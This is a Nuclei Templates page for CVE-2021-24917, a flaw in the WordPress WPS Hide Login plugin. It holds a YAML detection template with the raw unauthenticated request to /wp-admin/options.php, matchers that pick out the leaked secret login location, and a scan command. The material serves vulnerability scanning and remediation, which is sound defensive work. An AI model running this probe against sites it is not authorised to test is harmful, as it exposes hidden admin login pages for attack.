Skip to content
Nuclei Templates

WordPress WPS Hide Login <1.9.1 - Information Disclosure

ID: CVE-2021-24917

Severity: high

Author: akincibor

Tags: cve2021,cve,wp,wordpress,wp-plugin,unauth,wpscan,wpserveur

Description

Section titled “Description”

WordPress WPS Hide Login plugin before 1.9.1 is susceptible to incorrect authorization. An attacker can obtain the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user. This reveals the secret login location.

YAML Source

Section titled “YAML Source”
id: CVE-2021-24917


info:
  name: WordPress WPS Hide Login <1.9.1 - Information Disclosure
  author: akincibor
  severity: high
  description: WordPress WPS Hide Login plugin before 1.9.1 is susceptible to incorrect authorization. An attacker can obtain the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user. This reveals the secret login location.
  impact: |
    An attacker can gain sensitive information about the WordPress site, such as the login page URL.
  remediation: Fixed in version 1.9.1.
  reference:
    - https://wpscan.com/vulnerability/15bb711a-7d70-4891-b7a2-c473e3e8b375
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24917
    - https://wordpress.org/support/topic/bypass-security-issue/
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-24917
    cwe-id: CWE-863
    epss-score: 0.04098
    epss-percentile: 0.92139
    cpe: cpe:2.3:a:wpserveur:wps_hide_login:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wpserveur
    product: wps_hide_login
    framework: wordpress
  tags: cve2021,cve,wp,wordpress,wp-plugin,unauth,wpscan,wpserveur


http:
  - raw:
      - |
        GET /wp-admin/options.php HTTP/1.1
        Host: {{Hostname}}
        Referer: something


    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "!contains(tolower(location), 'wp-login.php')"


      - type: word
        part: header
        words:
          - 'redirect_to=%2Fwp-admin%2Fsomething&reauth=1'


    extractors:
      - type: kval
        kval:
          - location
# digest: 4b0a00483046022100cbc033492f913158f00fe6bbd4dcb893b666aa732b4322b59a9533c29ede6323022100e87109f50d4966265f74d0cf4d266c1ef7983e5ddb676a7a344e29984368d733:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24917.yaml"

View on Github